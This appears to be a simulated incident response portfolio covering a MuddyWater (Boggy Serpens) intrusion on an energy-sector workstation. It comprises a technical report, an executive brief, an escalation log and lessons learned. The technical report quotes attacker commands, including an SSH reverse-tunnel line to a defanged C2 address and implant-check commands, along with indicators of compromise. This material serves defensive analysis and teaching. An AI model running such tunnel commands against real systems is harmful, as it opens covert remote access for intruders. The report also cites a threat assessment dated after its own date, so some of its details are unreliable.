Operation Coastal Intrusion — Boggy Serpens Campaign Response · January 2026
A full-cycle incident response simulation documenting the detection, investigation, escalation, and remediation of a Boggy Serpens (MuddyWater) intrusion against a simulated energy sector organization. This suite demonstrates the ability to produce all written deliverables a security operations team generates during and after an active incident — adapting format, depth, and language for every audience from technical analysts to executive leadership.
This report documents the full technical investigation of Incident INC-2026-0124, a confirmed Boggy Serpens intrusion detected January 24, 2026, against a simulated energy sector organization. The investigation covers initial detection, forensic analysis, attack chain reconstruction, and containment actions taken.
On January 24, 2026 at approximately 22:00 UTC, a Tier 1 SOC analyst escalated an alert from Cortex XDR flagging anomalous process execution on endpoint WS-ENGR-047, an engineering workstation in the organization's maritime operations division. Initial triage confirmed active attacker presence. The incident was classified Critical and Tier 2 response was activated within 14 minutes of initial detection.
Forensic analysis confirmed the intrusion was conducted by Boggy Serpens (MuddyWater / G0069), an Iranian MOIS-attributed threat actor with a documented mandate to target energy, maritime, and engineering sector organizations consistent with this organization's profile. The attack chain is consistent with TTPs documented in the Unit 42 Boggy Serpens Threat Assessment published March 2026 and the Huntress MuddyWater attack chain analysis of January 2026.
| Field | Value |
|---|---|
| Incident ID | INC-2026-0124 |
| Detection Time | 2026-01-24T22:00:00Z |
| Containment Time | 2026-01-24T23:47:00Z |
| Dwell Time | ~4 hours (estimated initial access 18:00 UTC) |
| Affected Endpoint | WS-ENGR-047 — Engineering Workstation · Windows 11 Pro |
| Affected User | Engineering Department — credentials not confirmed compromised at time of report |
| Threat Actor | Boggy Serpens · MuddyWater · G0069 · Iran MOIS — HIGH CONFIDENCE |
| Attack Vector | Spearphishing attachment — macro-laden Word document via compromised partner account |
| Severity | CRITICAL — Nation-state intrusion · Active C2 · Lateral movement observed |
The following timeline was reconstructed from Cortex XDR telemetry, Windows Event Logs, email gateway logs, and network flow data. All timestamps are UTC.
FMAPP.exe to C:\Users\[user]\AppData\Roaming\novaservice.exe — a file path observed across the Boggy Serpens Phoenix Lineage and UDPGangster toolchains sharing an identical decryption key. FMAPP.exe loaded a malicious DLL establishing the initial implant.C:\Windows\System32\OpenSSH\ssh.exe -p 22 -o StrictHostKeyChecking=no asuedulimit@162.0.230[.]185 -2 -4 -N -R 10841tasklist | findstr FMAPP to verify the implant was running, then connected to ifconfig[.]me to confirm the victim machine's public IP address — standard Boggy Serpens operational security verification behavior.ifconfig[.]me from a workstation with no prior history of either behavior. Alert classified HIGH. Tier 1 analyst escalated to Tier 2 at 22:14 UTC.162.0.230[.]185 applied at 22:31 UTC. Scheduled task and FMAPP.exe removed at 22:47 UTC. No evidence of lateral movement to additional hosts confirmed at time of containment.| Technique ID | Tactic | Name | Evidence |
|---|---|---|---|
| T1566.001 | Initial Access | Phishing: Spearphishing Attachment | Macro-laden Word document delivered from compromised external partner account |
| T1059.005 | Execution | Visual Basic | VBA macro in Word document dropping FMAPP.exe loader |
| T1053.005 | Persistence | Scheduled Task / Job | Startup scheduled task executing FMAPP.exe on system reboot |
| T1036 | Defense Evasion | Masquerading | novaservice.exe file path; scheduled task name mimicking legitimate service |
| T1572 | Command & Control | Protocol Tunneling | SSH reverse tunnel via native Windows OpenSSH to 162.0.230[.]185 |
| T1016 | Discovery | System Network Configuration Discovery | Connection to ifconfig[.]me to confirm victim public IP address |
| T1057 | Discovery | Process Discovery | tasklist | findstr FMAPP executed to verify implant execution |
# 2026-01-24 22:22:03 UTC — First SSH tunnel attempt C:\Windows\System32\OpenSSH\ssh.exe -p 22 \ -o StrictHostKeyChecking=no \ asuedulimit@162.0.230[.]185 \ -2 -4 -N -R 10841 # 2026-01-24 22:26:48 UTC — Second attempt after initial C2 verification failure C:\Windows\System32\OpenSSH\ssh.exe -p 22 -o StrictHostKeyChecking=no asuedulimit@162.0.230[.]185 -2 -4 -N -R 10841 # Attacker verification commands (reconstructed from process telemetry) tasklist | findstr FMAPP ping 162.0.230[.]185 C:\Windows\System32\OpenSSH\ssh.exe # re-executed after ping confirmation
| Indicator | Type | Context |
|---|---|---|
| 162.0.230[.]185 | IP (defanged) | SSH C2 server — observed in Huntress MuddyWater investigation January 2026 |
| novaservice.exe | File Path / Name | Shared artifact across Phoenix Lineage and UDPGangster builder tracks |
| FMAPP.exe | Executable | Custom DLL loader — drops malicious DLL establishing implant |
| asuedulimit | SSH Username | C2 tunnel username observed in Huntress analysis |
| ifconfig[.]me | Domain (defanged) | Public IP discovery — attacker operational security verification step |
Prepared for: Chief Executive Officer, Chief Operating Officer, General Counsel, Board Risk Committee
Classification: Internal · Confidential · TLP:WHITE (this simulation)
Date: January 25, 2026
On the evening of January 24, 2026, a state-sponsored Iranian hacking group known as Boggy Serpens successfully compromised one engineering workstation within this organization. The attacker gained access by sending a malicious document disguised as an internal engineering report — delivered from an email address that appeared to belong to a trusted external partner.
Our security operations team detected the intrusion approximately four hours after it began, isolated the affected computer within 23 minutes of detection, and confirmed containment within two hours. There is currently no evidence that sensitive data was copied or transmitted out of the organization. Investigation continues.
Boggy Serpens — also known as MuddyWater — is an Iranian government hacking team that has been active since 2017, targeting energy companies, maritime operators, government ministries, and diplomatic missions across the Middle East, Europe, and the Americas. The group works in service of Iran's Ministry of Intelligence and Security. Their goal in this type of operation is intelligence collection — stealing sensitive documents, monitoring communications, and maintaining long-term hidden access to strategic organizations. Palo Alto Networks Unit 42 published a major threat assessment of this group in March 2026, citing a significant escalation in the sophistication and persistence of their campaigns.
The compromised workstation has been isolated from the network and is undergoing forensic imaging. Engineering operations on other systems were not affected. No systems were encrypted, destroyed, or rendered unavailable. No customer-facing services were disrupted.
The affected workstation had access to engineering documentation related to maritime infrastructure projects. Forensic analysis is ongoing to determine precisely which files the attacker could have accessed during the four-hour dwell period. A definitive data exposure assessment will be provided within 48 hours. General Counsel has been notified and is monitoring regulatory notification obligations.
Depending on the outcome of the data exposure investigation, the organization may have notification obligations under applicable data protection regulations. General Counsel and the privacy team are engaged. No notifications have been issued at this time. A decision point will be reached within 72 hours pending forensic findings.
A sophisticated nation-state attacker successfully compromised one workstation in our engineering division and maintained hidden access for approximately four hours. Our security team detected and contained the intrusion the same evening. There is no evidence of data loss at this time, but investigation continues. The security team is treating this as a high-priority incident and will provide daily updates until the investigation is closed.
The attacker's method — sending a malicious document from a trusted partner's compromised email account — is specifically designed to defeat standard email security controls. This was not a failure of employee behavior or negligence. It was a sophisticated technique that exploits human trust in known contacts. The appropriate response is technical: enforcing phishing-resistant authentication and deploying behavioral email analytics. Recommendations follow in the Lessons Learned document.
This document records all formal escalations, stakeholder notifications, and decision-point communications during Incident INC-2026-0124. Maintained as the authoritative communication audit trail for post-incident review and potential regulatory review. All timestamps are UTC.
C:\Users\[user]\AppData\Roaming\novaservice.exe
— a known Boggy Serpens artifact path. Attacker confirmed to have run
tasklist | findstr FMAPP and ping 162.0.230[.]185,
indicating active C2 session management. Incident reclassified CRITICAL.
Tier 2 analyst and SOC Lead paged via PagerDuty.
| Metric | Time | Target SLA | Status |
|---|---|---|---|
| Time to Detection (from estimated initial access) | ~4 hours | Less than 1 hour (ideal) | Exceeded Target |
| Time from Detection to Tier 2 Escalation | 14 minutes | 30 minutes | Within SLA |
| Time from Detection to Endpoint Isolation | 23 minutes | 30 minutes | Within SLA |
| Time from Detection to Network Blocks | 31 minutes | 30 minutes | Marginally Exceeded |
| Time from Detection to Containment Confirmed | 1 hour 47 min | 2 hours | Within SLA |
| Time from Detection to Executive Notification | 11 hours (next morning) | 4 hours | Exceeded — see Lessons Learned |
Distribution: All Staff · IT and Security Teams · Senior Leadership
Purpose: Organizational learning and process improvement following INC-2026-0124
Date: February 3, 2026
The security team performed well under pressure. These elements of the response should be preserved and strengthened.
| Priority | Action | Owner | Timeline | Expected Impact |
|---|---|---|---|---|
| P1 | Deploy Office macro execution detection rule — alert on any Office process spawning cmd.exe, PowerShell, or non-standard child processes | SOC Engineering | 72 hours | Reduces dwell time for macro-delivered malware from hours to minutes |
| P1 | Block macro execution via Group Policy for all users without documented business requirements | IT Operations | 30 days | Eliminates primary initial access vector used in this and 80%+ of Boggy Serpens campaigns |
| P2 | Deploy phishing-resistant MFA on all email accounts — FIDO2 hardware keys for high-value accounts | IT Security | 60 days | Prevents account takeover even if credentials are compromised — defeats Boggy Serpens' trusted-account phishing technique |
| P2 | Update IR Plan — define 4-hour executive notification SLA for nation-state incidents; update on-call rotation | CISO | 14 days | Closes escalation SLA gap identified in this incident; ensures leadership is informed within regulatory and governance timeframes |
| P3 | Deploy behavioral email analytics assessing thematic anomalies beyond sender reputation | IT Security | 90 days | Provides detection capability against internal account phishing — Boggy Serpens' most evasion-resistant technique |
This incident was a deliberate, targeted attack by a well-resourced nation-state actor with a specific mandate to penetrate maritime and energy sector organizations. The attacker's choice of this organization was not random — it reflects strategic intelligence about this industry and the adversary's operational priorities.
The security team's response was effective and professional. Containment was achieved the same evening. The gaps identified in this review are process and policy gaps, not gaps in analyst competence or platform capability. Closing them systematically over the next 90 days will meaningfully reduce the risk of a similar incident resulting in successful data exfiltration.
Cybersecurity research only protects organizations when the findings reach the right audience in the right format. This suite of documents — the technical investigation, the executive brief, the escalation log, and these lessons learned — represents that principle in practice. Every stakeholder received the information they needed, in the language they could act on.